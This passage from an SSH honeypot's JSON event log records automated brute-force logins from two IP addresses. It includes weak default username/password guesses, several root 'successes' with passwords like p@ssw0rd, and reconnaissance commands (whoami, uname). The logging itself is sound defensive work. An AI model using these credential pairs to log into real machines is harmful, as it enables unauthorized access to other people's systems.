0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:36.442699Z","src_ip":"212.227.125.160","session":"d6583160699c"}
{"eventid":"cowrie.login.failed","username":"user50","password":"user50","message":"login attempt [user50/user50] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:36.648581Z","src_ip":"212.227.125.160","session":"d6583160699c"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:37.739258Z","src_ip":"212.227.125.160","session":"d6583160699c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51914,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a904f53587a","protocol":"ssh","message":"New connection: 212.227.125.160:51914 (1.2.3.4:22) [session: 1a904f53587a]","sensor":"my-vps","timestamp":"2025-08-26T21:49:42.932563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:42.963293Z","src_ip":"212.227.125.160","session":"1a904f53587a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:43.026818Z","src_ip":"212.227.125.160","session":"1a904f53587a"}
{"eventid":"cowrie.login.failed","username":"upmpdcli","password":"upmpdcli","message":"login attempt [upmpdcli/upmpdcli] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:43.279451Z","src_ip":"212.227.125.160","session":"1a904f53587a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:44.353760Z","src_ip":"212.227.125.160","session":"1a904f53587a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4781,"dst_ip":"1.2.3.4","dst_port":22,"session":"93153c414c67","protocol":"ssh","message":"New connection: 212.227.235.229:4781 (1.2.3.4:22) [session: 93153c414c67]","sensor":"my-vps","timestamp":"2025-08-26T21:49:45.133875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:45.134509Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:45.305941Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w#E4r","message":"login attempt [root/!Q2w#E4r] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:49:45.825400Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:49:46.204043Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T21:49:46.204739Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:46.377723Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:46.378932Z","src_ip":"212.227.235.229","session":"93153c414c67"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47300,"dst_ip":"1.2.3.4","dst_port":22,"session":"86dbc5509f12","protocol":"ssh","message":"New connection: 212.227.125.160:47300 (1.2.3.4:22) [session: 86dbc5509f12]","sensor":"my-vps","timestamp":"2025-08-26T21:49:47.433831Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:47.434725Z","src_ip":"212.227.125.160","session":"86dbc5509f12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:47.479126Z","src_ip":"212.227.125.160","session":"86dbc5509f12"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:47.617150Z","src_ip":"212.227.125.160","session":"86dbc5509f12"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:48.663547Z","src_ip":"212.227.125.160","session":"86dbc5509f12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42686,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ed79b8d428b","protocol":"ssh","message":"New connection: 212.227.125.160:42686 (1.2.3.4:22) [session: 0ed79b8d428b]","sensor":"my-vps","timestamp":"2025-08-26T21:49:52.872236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:52.873188Z","src_ip":"212.227.125.160","session":"0ed79b8d428b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:52.923529Z","src_ip":"212.227.125.160","session":"0ed79b8d428b"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-26T21:49:53.076842Z","src_ip":"212.227.125.160","session":"0ed79b8d428b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:54.146475Z","src_ip":"212.227.125.160","session":"0ed79b8d428b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38074,"dst_ip":"1.2.3.4","dst_port":22,"session":"be82e64b7db6","protocol":"ssh","message":"New connection: 212.227.125.160:38074 (1.2.3.4:22) [session: be82e64b7db6]","sensor":"my-vps","timestamp":"2025-08-26T21:49:58.906277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:49:58.907985Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:49:58.956187Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:49:59.162387Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:49:59.345360Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:49:59.346227Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:59.402937Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:49:59.406419Z","src_ip":"212.227.125.160","session":"be82e64b7db6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33464,"dst_ip":"1.2.3.4","dst_port":22,"session":"eab3045743b4","protocol":"ssh","message":"New connection: 212.227.125.160:33464 (1.2.3.4:22) [session: eab3045743b4]","sensor":"my-vps","timestamp":"2025-08-26T21:50:04.355387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:04.511899Z","src_ip":"212.227.125.160","session":"eab3045743b4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:04.512900Z","src_ip":"212.227.125.160","session":"eab3045743b4"}
{"eventid":"cowrie.login.failed","username":"netdata","password":"netdata","message":"login attempt [netdata/netdata] failed","sensor":"my-vps","timestamp":"2025-08-26T21:50:04.973128Z","src_ip":"212.227.125.160","session":"eab3045743b4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:06.032391Z","src_ip":"212.227.125.160","session":"eab3045743b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57086,"dst_ip":"1.2.3.4","dst_port":22,"session":"21a12b23adfe","protocol":"ssh","message":"New connection: 212.227.125.160:57086 (1.2.3.4:22) [session: 21a12b23adfe]","sensor":"my-vps","timestamp":"2025-08-26T21:50:09.709448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:09.724482Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:09.777137Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:50:10.217223Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:50:10.343717Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:50:10.344532Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:10.397678Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:10.398857Z","src_ip":"212.227.125.160","session":"21a12b23adfe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52470,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d4e1165ab7f","protocol":"ssh","message":"New connection: 212.227.125.160:52470 (1.2.3.4:22) [session: 5d4e1165ab7f]","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.436311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.441131Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.482478Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.659653Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:50:15.821808Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.822652Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.868872Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:50:15.869897Z","src_ip":"212.227.125.160","session":"5d4e1165ab7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47856,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1a3108b7ff2","protocol":"ssh","message":"New connection: 212.227.125.160:47856 (1.2.3.4:22) [session: b1a3108b7ff2]","sensor":"my-vps","timestamp":"2025-08-26T21:50:20.834292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:50:21.134558Z","src_ip":"212.227.125.160","session":"b1a3108b7ff2"}
